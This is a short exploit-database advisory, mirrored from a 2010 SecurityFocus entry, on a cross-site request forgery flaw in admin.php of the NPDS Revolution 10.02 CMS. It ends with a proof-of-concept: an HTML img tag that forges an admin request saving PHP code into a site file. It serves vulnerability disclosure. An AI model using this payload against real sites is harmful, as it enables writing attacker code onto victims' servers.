NPDS REvolution 10.02 – ‘admin.php’ Cross-Site Request Forgery

  • 作者: High-Tech Bridge SA
    日期: 2010-05-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34032/
  • source: https://www.securityfocus.com/bid/40331/info
    
    NPDS Revolution is prone to a cross-site request-forgery vulnerability.
    
    Attackers can exploit this issue to compromise the affected application, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
    
    NPDS Revolution 10.02 is vulnerable; prior versions may also be affected. 
    
    The following example request is available:
    
    <img src="http://www.example.com/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1">